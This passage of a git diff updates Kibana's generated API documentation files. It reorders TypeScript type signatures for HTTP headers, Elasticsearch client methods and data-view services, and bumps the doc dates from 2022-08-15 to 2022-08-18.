\"proxy-authenticate\" | \"proxy-authorization\" | \"public-key-pins\" | \"range\" | \"referer\" | \"retry-after\" | \"sec-websocket-accept\" | \"sec-websocket-extensions\" | \"sec-websocket-key\" | \"sec-websocket-protocol\" | \"sec-websocket-version\" | \"set-cookie\" | \"strict-transport-security\" | \"tk\" | \"trailer\" | \"transfer-encoding\" | \"upgrade\" | \"user-agent\" | \"vary\" | \"via\" | \"warning\" | \"www-authenticate\"" ], "path": "node_modules/@types/kbn__core-http-server/index.d.ts", "deprecated": false, @@ -39402,9 +39402,9 @@ "\nA sub-set of {@link UiSettingsParams} exposed to the client-side." ], "signature": [ - "{ metric?: { type: string; name: string; } | undefined; type?: ", + "{ options?: string[] | number[] | undefined; type?: ", "UiSettingsType", - " | undefined; name?: string | undefined; order?: number | undefined; value?: unknown; description?: string | undefined; options?: number[] | string[] | undefined; category?: string[] | undefined; optionLabels?: Record | undefined; requiresPageReload?: boolean | undefined; readonly?: boolean | undefined; sensitive?: boolean | undefined; deprecation?: ", + " | undefined; metric?: { type: string; name: string; } | undefined; value?: unknown; description?: string | undefined; name?: string | undefined; order?: number | undefined; category?: string[] | undefined; optionLabels?: Record | undefined; requiresPageReload?: boolean | undefined; readonly?: boolean | undefined; sensitive?: boolean | undefined; deprecation?: ", "DeprecationSettings", " | undefined; }" ], @@ -39639,7 +39639,7 @@ "\nHttp response headers to set." ], "signature": [ - "Record<\"from\" | \"origin\" | \"warning\" | \"location\" | \"date\" | \"expires\" | \"range\" | \"allow\" | \"accept\" | \"host\" | \"etag\" | \"authorization\" | \"accept-language\" | \"accept-patch\" | \"accept-ranges\" | \"access-control-allow-credentials\" | \"access-control-allow-headers\" | \"access-control-allow-methods\" | \"access-control-allow-origin\" | \"access-control-expose-headers\" | \"access-control-max-age\" | \"access-control-request-headers\" | \"access-control-request-method\" | \"age\" | \"alt-svc\" | \"cache-control\" | \"connection\" | \"content-disposition\" | \"content-encoding\" | \"content-language\" | \"content-length\" | \"content-location\" | \"content-range\" | \"content-type\" | \"cookie\" | \"expect\" | \"forwarded\" | \"if-match\" | \"if-modified-since\" | \"if-none-match\" | \"if-unmodified-since\" | \"last-modified\" | \"pragma\" | \"proxy-authenticate\" | \"proxy-authorization\" | \"public-key-pins\" | \"referer\" | \"retry-after\" | \"sec-websocket-accept\" | \"sec-websocket-extensions\" | \"sec-websocket-key\" | \"sec-websocket-protocol\" | \"sec-websocket-version\" | \"set-cookie\" | \"strict-transport-security\" | \"tk\" | \"trailer\" | \"transfer-encoding\" | \"upgrade\" | \"user-agent\" | \"vary\" | \"via\" | \"www-authenticate\", string | string[]> | Record" + "Record<\"accept\" | \"accept-language\" | \"accept-patch\" | \"accept-ranges\" | \"access-control-allow-credentials\" | \"access-control-allow-headers\" | \"access-control-allow-methods\" | \"access-control-allow-origin\" | \"access-control-expose-headers\" | \"access-control-max-age\" | \"access-control-request-headers\" | \"access-control-request-method\" | \"age\" | \"allow\" | \"alt-svc\" | \"authorization\" | \"cache-control\" | \"connection\" | \"content-disposition\" | \"content-encoding\" | \"content-language\" | \"content-length\" | \"content-location\" | \"content-range\" | \"content-type\" | \"cookie\" | \"date\" | \"etag\" | \"expect\" | \"expires\" | \"forwarded\" | \"from\" | \"host\" | \"if-match\" | \"if-modified-since\" | \"if-none-match\" | \"if-unmodified-since\" | \"last-modified\" | \"location\" | \"origin\" | \"pragma\" | \"proxy-authenticate\" | \"proxy-authorization\" | \"public-key-pins\" | \"range\" | \"referer\" | \"retry-after\" | \"sec-websocket-accept\" | \"sec-websocket-extensions\" | \"sec-websocket-key\" | \"sec-websocket-protocol\" | \"sec-websocket-version\" | \"set-cookie\" | \"strict-transport-security\" | \"tk\" | \"trailer\" | \"transfer-encoding\" | \"upgrade\" | \"user-agent\" | \"vary\" | \"via\" | \"warning\" | \"www-authenticate\", string | string[]> | Record" ], "path": "node_modules/@types/kbn__core-http-server/index.d.ts", "deprecated": false, @@ -39671,9 +39671,9 @@ "\nThe set of common HTTP methods supported by Kibana routing." ], "signature": [ - "DestructiveRouteMethod", + "SafeRouteMethod", " | ", - "SafeRouteMethod" + "DestructiveRouteMethod" ], "path": "node_modules/@types/kbn__core-http-server/index.d.ts", "deprecated": false, @@ -39880,7 +39880,7 @@ "\nSet of HTTP methods not changing the state of the server." ], "signature": [ - "\"options\" | \"get\"" + "\"get\" | \"options\"" ], "path": "node_modules/@types/kbn__core-http-server/index.d.ts", "deprecated": false, diff --git a/api_docs/core.mdx b/api_docs/core.mdx index 36030a74bfe62..031ce073990c9 100644 --- a/api_docs/core.mdx +++ b/api_docs/core.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/core title: "core" image: https://source.unsplash.com/400x175/?github description: API docs for the core plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'core'] --- import coreObj from './core.devdocs.json'; diff --git a/api_docs/core_application.devdocs.json b/api_docs/core_application.devdocs.json index 00b0c241fac11..30eaa3462a34a 100644 --- a/api_docs/core_application.devdocs.json +++ b/api_docs/core_application.devdocs.json @@ -2168,7 +2168,7 @@ "section": "def-public.AppStatus", "text": "AppStatus" }, - " | undefined; tooltip?: string | undefined; searchable?: boolean | undefined; deepLinks?: ", + " | undefined; searchable?: boolean | undefined; deepLinks?: ", { "pluginId": "core", "scope": "public", @@ -2184,7 +2184,7 @@ "section": "def-public.AppNavLinkStatus", "text": "AppNavLinkStatus" }, - " | undefined; defaultPath?: string | undefined; }" + " | undefined; defaultPath?: string | undefined; tooltip?: string | undefined; }" ], "path": "src/core/public/application/types.ts", "deprecated": false, diff --git a/api_docs/core_application.mdx b/api_docs/core_application.mdx index ca13e640edaea..a36996fbf1b26 100644 --- a/api_docs/core_application.mdx +++ b/api_docs/core_application.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/core-application title: "core.application" image: https://source.unsplash.com/400x175/?github description: API docs for the core.application plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'core.application'] --- import coreApplicationObj from './core_application.devdocs.json'; diff --git a/api_docs/core_chrome.devdocs.json b/api_docs/core_chrome.devdocs.json index f7ad640b55bb7..a1c6878eef063 100644 --- a/api_docs/core_chrome.devdocs.json +++ b/api_docs/core_chrome.devdocs.json @@ -1912,7 +1912,7 @@ "signature": [ "React.HTMLAttributes & ", "CommonProps", - " & { href?: string | undefined; onClick?: React.MouseEventHandler | undefined; text: React.ReactNode; truncate?: boolean | undefined; color?: \"primary\" | \"success\" | \"accent\" | \"warning\" | \"danger\" | \"text\" | \"subdued\" | \"ghost\" | undefined; 'aria-current'?: boolean | \"true\" | \"false\" | \"page\" | \"step\" | \"location\" | \"date\" | \"time\" | undefined; }" + " & { href?: string | undefined; onClick?: React.MouseEventHandler | undefined; text: React.ReactNode; truncate?: boolean | undefined; color?: \"warning\" | \"subdued\" | \"primary\" | \"accent\" | \"success\" | \"danger\" | \"text\" | \"ghost\" | undefined; 'aria-current'?: boolean | \"date\" | \"location\" | \"time\" | \"page\" | \"false\" | \"true\" | \"step\" | undefined; }" ], "path": "src/core/public/chrome/types.ts", "deprecated": false, @@ -1926,9 +1926,9 @@ "label": "ChromeHelpExtensionLinkBase", "description": [], "signature": [ - "{ target?: string | (string & {}) | undefined; 'data-test-subj'?: string | undefined; iconType?: ", + "{ iconType?: ", "IconType", - " | undefined; rel?: string | undefined; }" + " | undefined; 'data-test-subj'?: string | undefined; rel?: string | undefined; target?: string | (string & {}) | undefined; }" ], "path": "src/core/public/chrome/ui/header/header_help_menu.tsx", "deprecated": false, diff --git a/api_docs/core_chrome.mdx b/api_docs/core_chrome.mdx index a453a168f21ab..e8d295e6cf83a 100644 --- a/api_docs/core_chrome.mdx +++ b/api_docs/core_chrome.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/core-chrome title: "core.chrome" image: https://source.unsplash.com/400x175/?github description: API docs for the core.chrome plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'core.chrome'] --- import coreChromeObj from './core_chrome.devdocs.json'; diff --git a/api_docs/core_saved_objects.mdx b/api_docs/core_saved_objects.mdx index a190642c1a49d..f17193f0d4c23 100644 --- a/api_docs/core_saved_objects.mdx +++ b/api_docs/core_saved_objects.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/core-savedObjects title: "core.savedObjects" image: https://source.unsplash.com/400x175/?github description: API docs for the core.savedObjects plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'core.savedObjects'] --- import coreSavedObjectsObj from './core_saved_objects.devdocs.json'; diff --git a/api_docs/custom_integrations.devdocs.json b/api_docs/custom_integrations.devdocs.json index c6b9ecd132fea..a56430796e324 100644 --- a/api_docs/custom_integrations.devdocs.json +++ b/api_docs/custom_integrations.devdocs.json @@ -413,7 +413,7 @@ "label": "shipper", "description": [], "signature": [ - "\"other\" | \"beats\" | \"enterprise_search\" | \"language_clients\" | \"sample_data\" | \"tests\" | \"tutorial\" | \"placeholders\"" + "\"beats\" | \"enterprise_search\" | \"language_clients\" | \"other\" | \"sample_data\" | \"tests\" | \"tutorial\" | \"placeholders\"" ], "path": "src/plugins/custom_integrations/common/index.ts", "deprecated": false @@ -685,7 +685,7 @@ "label": "shipper", "description": [], "signature": [ - "\"other\" | \"beats\" | \"enterprise_search\" | \"language_clients\" | \"sample_data\" | \"tests\" | \"tutorial\" | \"placeholders\"" + "\"beats\" | \"enterprise_search\" | \"language_clients\" | \"other\" | \"sample_data\" | \"tests\" | \"tutorial\" | \"placeholders\"" ], "path": "src/plugins/custom_integrations/common/index.ts", "deprecated": false @@ -877,7 +877,7 @@ "\nThe list of all known shippers." ], "signature": [ - "(\"other\" | \"beats\" | \"enterprise_search\" | \"language_clients\" | \"sample_data\" | \"tests\" | \"tutorial\" | \"placeholders\")[]" + "(\"beats\" | \"enterprise_search\" | \"language_clients\" | \"other\" | \"sample_data\" | \"tests\" | \"tutorial\" | \"placeholders\")[]" ], "path": "src/plugins/custom_integrations/common/index.ts", "deprecated": false, @@ -893,7 +893,7 @@ "\nA shipper-- an internal or external system capable of storing data in ES/Kibana-- applicable to an Integration." ], "signature": [ - "\"other\" | \"beats\" | \"enterprise_search\" | \"language_clients\" | \"sample_data\" | \"tests\" | \"tutorial\" | \"placeholders\"" + "\"beats\" | \"enterprise_search\" | \"language_clients\" | \"other\" | \"sample_data\" | \"tests\" | \"tutorial\" | \"placeholders\"" ], "path": "src/plugins/custom_integrations/common/index.ts", "deprecated": false, diff --git a/api_docs/custom_integrations.mdx b/api_docs/custom_integrations.mdx index b91514379156a..e286dd8c873b1 100644 --- a/api_docs/custom_integrations.mdx +++ b/api_docs/custom_integrations.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/customIntegrations title: "customIntegrations" image: https://source.unsplash.com/400x175/?github description: API docs for the customIntegrations plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'customIntegrations'] --- import customIntegrationsObj from './custom_integrations.devdocs.json'; diff --git a/api_docs/dashboard.devdocs.json b/api_docs/dashboard.devdocs.json index 01decee7cd29b..32fc71a5d5c4c 100644 --- a/api_docs/dashboard.devdocs.json +++ b/api_docs/dashboard.devdocs.json @@ -2190,7 +2190,7 @@ "section": "def-common.RawSavedDashboardPanel730ToLatest", "text": "RawSavedDashboardPanel730ToLatest" }, - ", \"type\" | \"version\" | \"title\" | \"panelIndex\" | \"gridData\" | \"embeddableConfig\" | \"panelRefName\"> & { readonly id?: string | undefined; readonly type: string; }" + ", \"type\" | \"title\" | \"panelIndex\" | \"gridData\" | \"version\" | \"embeddableConfig\" | \"panelRefName\"> & { readonly id?: string | undefined; readonly type: string; }" ], "path": "src/plugins/dashboard/common/types.ts", "deprecated": false, @@ -2849,7 +2849,7 @@ "signature": [ "Pick<", "RawSavedDashboardPanel640To720", - ", \"version\" | \"title\" | \"panelIndex\" | \"gridData\" | \"embeddableConfig\"> & { readonly type?: string | undefined; readonly name?: string | undefined; panelIndex: string; panelRefName?: string | undefined; }" + ", \"title\" | \"panelIndex\" | \"gridData\" | \"version\" | \"embeddableConfig\"> & { readonly type?: string | undefined; readonly name?: string | undefined; panelIndex: string; panelRefName?: string | undefined; }" ], "path": "src/plugins/dashboard/common/bwc/types.ts", "deprecated": false, @@ -2865,7 +2865,7 @@ "signature": [ "Pick<", "RawSavedDashboardPanel610", - ", \"version\" | \"title\" | \"columns\" | \"sort\" | \"panelIndex\" | \"gridData\"> & { readonly id: string; readonly type: string; }" + ", \"columns\" | \"title\" | \"sort\" | \"panelIndex\" | \"gridData\" | \"version\"> & { readonly id: string; readonly type: string; }" ], "path": "src/plugins/dashboard/common/types.ts", "deprecated": false, @@ -2881,7 +2881,7 @@ "signature": [ "Pick<", "RawSavedDashboardPanel620", - ", \"version\" | \"title\" | \"columns\" | \"sort\" | \"panelIndex\" | \"gridData\" | \"embeddableConfig\"> & { readonly id: string; readonly type: string; }" + ", \"columns\" | \"title\" | \"sort\" | \"panelIndex\" | \"gridData\" | \"version\" | \"embeddableConfig\"> & { readonly id: string; readonly type: string; }" ], "path": "src/plugins/dashboard/common/types.ts", "deprecated": false, @@ -2897,7 +2897,7 @@ "signature": [ "Pick<", "RawSavedDashboardPanel620", - ", \"version\" | \"title\" | \"columns\" | \"sort\" | \"panelIndex\" | \"gridData\" | \"embeddableConfig\"> & { readonly id: string; readonly type: string; }" + ", \"columns\" | \"title\" | \"sort\" | \"panelIndex\" | \"gridData\" | \"version\" | \"embeddableConfig\"> & { readonly id: string; readonly type: string; }" ], "path": "src/plugins/dashboard/common/types.ts", "deprecated": false, @@ -2913,7 +2913,7 @@ "signature": [ "Pick<", "RawSavedDashboardPanel640To720", - ", \"version\" | \"title\" | \"panelIndex\" | \"gridData\" | \"embeddableConfig\"> & { readonly id: string; readonly type: string; }" + ", \"title\" | \"panelIndex\" | \"gridData\" | \"version\" | \"embeddableConfig\"> & { readonly id: string; readonly type: string; }" ], "path": "src/plugins/dashboard/common/types.ts", "deprecated": false, @@ -2935,7 +2935,7 @@ "section": "def-common.RawSavedDashboardPanel730ToLatest", "text": "RawSavedDashboardPanel730ToLatest" }, - ", \"type\" | \"version\" | \"title\" | \"panelIndex\" | \"gridData\" | \"embeddableConfig\" | \"panelRefName\"> & { readonly id?: string | undefined; readonly type: string; }" + ", \"type\" | \"title\" | \"panelIndex\" | \"gridData\" | \"version\" | \"embeddableConfig\" | \"panelRefName\"> & { readonly id?: string | undefined; readonly type: string; }" ], "path": "src/plugins/dashboard/common/types.ts", "deprecated": false, @@ -2951,7 +2951,7 @@ "signature": [ "Pick<", "RawSavedDashboardPanelTo60", - ", \"title\" | \"row\" | \"columns\" | \"sort\" | \"size_x\" | \"size_y\" | \"col\" | \"panelIndex\"> & { readonly id: string; readonly type: string; }" + ", \"columns\" | \"title\" | \"sort\" | \"size_x\" | \"size_y\" | \"row\" | \"col\" | \"panelIndex\"> & { readonly id: string; readonly type: string; }" ], "path": "src/plugins/dashboard/common/types.ts", "deprecated": false, diff --git a/api_docs/dashboard.mdx b/api_docs/dashboard.mdx index a7001b2c0641d..fcfebd40433be 100644 --- a/api_docs/dashboard.mdx +++ b/api_docs/dashboard.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/dashboard title: "dashboard" image: https://source.unsplash.com/400x175/?github description: API docs for the dashboard plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'dashboard'] --- import dashboardObj from './dashboard.devdocs.json'; diff --git a/api_docs/dashboard_enhanced.mdx b/api_docs/dashboard_enhanced.mdx index 2277f7db3f0e7..1f2c997f417a4 100644 --- a/api_docs/dashboard_enhanced.mdx +++ b/api_docs/dashboard_enhanced.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/dashboardEnhanced title: "dashboardEnhanced" image: https://source.unsplash.com/400x175/?github description: API docs for the dashboardEnhanced plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'dashboardEnhanced'] --- import dashboardEnhancedObj from './dashboard_enhanced.devdocs.json'; diff --git a/api_docs/data.devdocs.json b/api_docs/data.devdocs.json index 8cafd5f1b0a98..78c8f4c0dec76 100644 --- a/api_docs/data.devdocs.json +++ b/api_docs/data.devdocs.json @@ -8400,9 +8400,9 @@ "section": "def-common.IAggType", "text": "IAggType" }, - "; id?: string | undefined; enabled?: boolean | undefined; params?: {} | ", + "; params?: {} | ", "SerializableRecord", - " | undefined; schema?: string | undefined; }" + " | undefined; id?: string | undefined; enabled?: boolean | undefined; schema?: string | undefined; }" ], "path": "src/plugins/data/common/search/aggs/agg_config.ts", "deprecated": false, @@ -14855,7 +14855,61 @@ "label": "elasticsearchClient", "description": [], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: { (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "GetResponse", + ">; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "GetResponse", + ", unknown>>; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "GetResponse", + ">; }; delete: { (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "WriteResponseBase", + ">; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "WriteResponseBase", + ", unknown>>; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "WriteResponseBase", + ">; }; cluster: ", + "default", + "; eql: ", "default", "; search: { >; }; cluster: ", - "default", - "; eql: ", - "default", - "; create: { (this: That, params: ", + ">; }; create: { (this: That, params: ", "CreateRequest", " | ", "CreateRequest", @@ -14923,7 +14973,7 @@ "default", "; security: ", "default", - "; index: { (this: That, params: ", + "; name: string | symbol; index: { (this: That, params: ", "IndexRequest", " | ", "IndexRequest", @@ -14949,33 +14999,7 @@ "TransportRequestOptions", " | undefined): Promise<", "WriteResponseBase", - ">; }; get: { (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "GetResponse", - ">; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "GetResponse", - ", unknown>>; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "GetResponse", - ">; }; update: { (this: That, params: ", + ">; }; update: { (this: That, params: ", "UpdateRequest", " | ", "UpdateRequest", @@ -15001,33 +15025,7 @@ "TransportRequestOptions", " | undefined): Promise<", "UpdateResponse", - ">; }; delete: { (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "WriteResponseBase", - ">; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "WriteResponseBase", - ", unknown>>; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "WriteResponseBase", - ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", + ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", "default", "; helpers: ", "default", @@ -15987,6 +15985,8 @@ "TermvectorsResponse", ">; }; textStructure: ", "default", + "; transform: ", + "default", "; updateByQuery: { (this: That, params: ", "UpdateByQueryRequest", " | ", @@ -23112,23 +23112,23 @@ "\nData views service interface" ], "signature": [ - "{ create: ({ id, name, title, ...restOfSpec }: ", + "{ get: (id: string) => Promise<", { "pluginId": "dataViews", "scope": "common", "docId": "kibDataViewsPluginApi", - "section": "def-common.DataViewSpec", - "text": "DataViewSpec" + "section": "def-common.DataView", + "text": "DataView" }, - ", skipFetchFields?: boolean) => Promise<", + ">; delete: (indexPatternId: string) => Promise<{}>; create: ({ id, name, title, ...restOfSpec }: ", { "pluginId": "dataViews", "scope": "common", "docId": "kibDataViewsPluginApi", - "section": "def-common.DataView", - "text": "DataView" + "section": "def-common.DataViewSpec", + "text": "DataViewSpec" }, - ">; find: (search: string, size?: number) => Promise<", + ", skipFetchFields?: boolean) => Promise<", { "pluginId": "dataViews", "scope": "common", @@ -23136,7 +23136,7 @@ "section": "def-common.DataView", "text": "DataView" }, - "[]>; get: (id: string) => Promise<", + ">; find: (search: string, size?: number) => Promise<", { "pluginId": "dataViews", "scope": "common", @@ -23144,7 +23144,7 @@ "section": "def-common.DataView", "text": "DataView" }, - ">; delete: (indexPatternId: string) => Promise<{}>; getCanSave: () => Promise; getIds: (refresh?: boolean) => Promise; getTitles: (refresh?: boolean) => Promise; getIdsWithTitle: (refresh?: boolean) => Promise<", + "[]>; getCanSave: () => Promise; getIds: (refresh?: boolean) => Promise; getTitles: (refresh?: boolean) => Promise; getIdsWithTitle: (refresh?: boolean) => Promise<", { "pluginId": "dataViews", "scope": "common", diff --git a/api_docs/data.mdx b/api_docs/data.mdx index 99a784080a5a7..24ce86ff562cc 100644 --- a/api_docs/data.mdx +++ b/api_docs/data.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/data title: "data" image: https://source.unsplash.com/400x175/?github description: API docs for the data plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'data'] --- import dataObj from './data.devdocs.json'; diff --git a/api_docs/data_query.mdx b/api_docs/data_query.mdx index a7e1053e04d8f..a37df6f5d0325 100644 --- a/api_docs/data_query.mdx +++ b/api_docs/data_query.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/data-query title: "data.query" image: https://source.unsplash.com/400x175/?github description: API docs for the data.query plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'data.query'] --- import dataQueryObj from './data_query.devdocs.json'; diff --git a/api_docs/data_search.devdocs.json b/api_docs/data_search.devdocs.json index 3dd21221f9afe..e767c6ed77ed2 100644 --- a/api_docs/data_search.devdocs.json +++ b/api_docs/data_search.devdocs.json @@ -349,15 +349,15 @@ "\nSearch sessions SO CRUD\n{@link ISessionsClient}" ], "signature": [ - "{ create: ({ name, appId, locatorId, initialState, restoreState, sessionId, }: { name: string; appId: string; locatorId: string; initialState: Record; restoreState: Record; sessionId: string; }) => Promise<", + "{ get: (sessionId: string) => Promise<", + "SearchSessionSavedObject", + ">; delete: (sessionId: string) => Promise; create: ({ name, appId, locatorId, initialState, restoreState, sessionId, }: { name: string; appId: string; locatorId: string; initialState: Record; restoreState: Record; sessionId: string; }) => Promise<", "SearchSessionSavedObject", ">; find: (options: Omit<", "SavedObjectsFindOptions", ", \"type\">) => Promise<", "SavedObjectsFindResponse", - ">; get: (sessionId: string) => Promise<", - "SearchSessionSavedObject", - ">; update: (sessionId: string, attributes: unknown) => Promise<", + ">; update: (sessionId: string, attributes: unknown) => Promise<", "SavedObjectsUpdateResponse", "<", { @@ -387,7 +387,7 @@ "section": "def-common.SearchSessionSavedObjectAttributes", "text": "SearchSessionSavedObjectAttributes" }, - ", unknown>>; delete: (sessionId: string) => Promise; }" + ", unknown>>; }" ], "path": "src/plugins/data/public/search/types.ts", "deprecated": false @@ -697,15 +697,15 @@ "\nSearch sessions SO CRUD\n{@link ISessionsClient}" ], "signature": [ - "{ create: ({ name, appId, locatorId, initialState, restoreState, sessionId, }: { name: string; appId: string; locatorId: string; initialState: Record; restoreState: Record; sessionId: string; }) => Promise<", + "{ get: (sessionId: string) => Promise<", + "SearchSessionSavedObject", + ">; delete: (sessionId: string) => Promise; create: ({ name, appId, locatorId, initialState, restoreState, sessionId, }: { name: string; appId: string; locatorId: string; initialState: Record; restoreState: Record; sessionId: string; }) => Promise<", "SearchSessionSavedObject", ">; find: (options: Omit<", "SavedObjectsFindOptions", ", \"type\">) => Promise<", "SavedObjectsFindResponse", - ">; get: (sessionId: string) => Promise<", - "SearchSessionSavedObject", - ">; update: (sessionId: string, attributes: unknown) => Promise<", + ">; update: (sessionId: string, attributes: unknown) => Promise<", "SavedObjectsUpdateResponse", "<", { @@ -735,7 +735,7 @@ "section": "def-common.SearchSessionSavedObjectAttributes", "text": "SearchSessionSavedObjectAttributes" }, - ", unknown>>; delete: (sessionId: string) => Promise; }" + ", unknown>>; }" ], "path": "src/plugins/data/public/search/types.ts", "deprecated": false @@ -1212,15 +1212,15 @@ "label": "ISessionsClient", "description": [], "signature": [ - "{ create: ({ name, appId, locatorId, initialState, restoreState, sessionId, }: { name: string; appId: string; locatorId: string; initialState: Record; restoreState: Record; sessionId: string; }) => Promise<", + "{ get: (sessionId: string) => Promise<", + "SearchSessionSavedObject", + ">; delete: (sessionId: string) => Promise; create: ({ name, appId, locatorId, initialState, restoreState, sessionId, }: { name: string; appId: string; locatorId: string; initialState: Record; restoreState: Record; sessionId: string; }) => Promise<", "SearchSessionSavedObject", ">; find: (options: Omit<", "SavedObjectsFindOptions", ", \"type\">) => Promise<", "SavedObjectsFindResponse", - ">; get: (sessionId: string) => Promise<", - "SearchSessionSavedObject", - ">; update: (sessionId: string, attributes: unknown) => Promise<", + ">; update: (sessionId: string, attributes: unknown) => Promise<", "SavedObjectsUpdateResponse", "<", { @@ -1250,7 +1250,7 @@ "section": "def-common.SearchSessionSavedObjectAttributes", "text": "SearchSessionSavedObjectAttributes" }, - ", unknown>>; delete: (sessionId: string) => Promise; }" + ", unknown>>; }" ], "path": "src/plugins/data/public/search/session/sessions_client.ts", "deprecated": false, @@ -2720,9 +2720,9 @@ "label": "options", "description": [], "signature": [ - "{ filter?: any; search?: string | undefined; page?: number | undefined; aggs?: Record | undefined; fields?: string[] | undefined; searchAfter?: string[] | undefined; perPage?: number | undefined; sortField?: string | undefined; sortOrder?: ", + "> | undefined; fields?: string[] | undefined; searchAfter?: string[] | undefined; page?: number | undefined; perPage?: number | undefined; sortField?: string | undefined; sortOrder?: ", "SortOrder", " | undefined; searchFields?: string[] | undefined; rootSearchFields?: string[] | undefined; hasReference?: ", "SavedObjectsFindOptionsReference", @@ -20389,7 +20389,7 @@ "label": "exclude", "description": [], "signature": [ - "number[] | string[] | undefined" + "string[] | number[] | undefined" ], "path": "src/plugins/data/common/search/aggs/buckets/terms.ts", "deprecated": false @@ -20402,7 +20402,7 @@ "label": "include", "description": [], "signature": [ - "number[] | string[] | undefined" + "string[] | number[] | undefined" ], "path": "src/plugins/data/common/search/aggs/buckets/terms.ts", "deprecated": false @@ -20481,7 +20481,7 @@ "label": "aggregate", "description": [], "signature": [ - "\"min\" | \"max\" | \"sum\" | \"concat\" | \"average\"" + "\"min\" | \"max\" | \"concat\" | \"sum\" | \"average\"" ], "path": "src/plugins/data/common/search/aggs/metrics/top_hit.ts", "deprecated": false @@ -26188,9 +26188,9 @@ "section": "def-common.IAggType", "text": "IAggType" }, - "; id?: string | undefined; enabled?: boolean | undefined; params?: {} | ", + "; params?: {} | ", "SerializableRecord", - " | undefined; schema?: string | undefined; }" + " | undefined; id?: string | undefined; enabled?: boolean | undefined; schema?: string | undefined; }" ], "path": "src/plugins/data/common/search/aggs/agg_config.ts", "deprecated": false, @@ -27004,9 +27004,9 @@ "section": "def-common.IAggType", "text": "IAggType" }, - "; id?: string | undefined; enabled?: boolean | undefined; params?: {} | ", + "; params?: 